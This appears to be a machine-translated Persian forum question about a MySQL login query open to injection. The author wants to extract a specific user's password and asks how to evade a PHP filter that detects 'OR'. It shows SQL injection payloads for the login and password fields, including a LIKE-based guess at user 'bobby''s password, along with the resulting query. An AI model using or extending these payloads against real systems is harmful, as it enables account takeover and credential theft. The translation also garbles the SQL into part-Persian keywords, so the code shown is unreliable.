من زیر درخواست MySQL حساس به تزریق و من نیاز به استخراج رمز عبور از یک کاربر داده شده :
SELECT * از کاربران در جایی که login = '$ ورود' و رمز عبور = '$ کلمه عبور'
با این حال از طریق تزریق، می توانم ببینم که قبل از ارسال، فیلدهای $ login و $ password فیلتر می شوند، به ویژه، اسکریپت های PHP تشخیص می دهند که OR در تزریق زیر:
login = > '|| '' = '
password => '|| login = 'bobby' && passwORd مانند 'A٪'
SELECT * از کاربران WHERE login = '' || '' = '' && password = '' || login = 'bobby' && passwORd مانند 'A٪' '
"OR" که در "رمز عبور" ظاهر می شود شناسایی و تزریق ناکام است.
آیا راهی برای دور زدن این وجود دارد؟
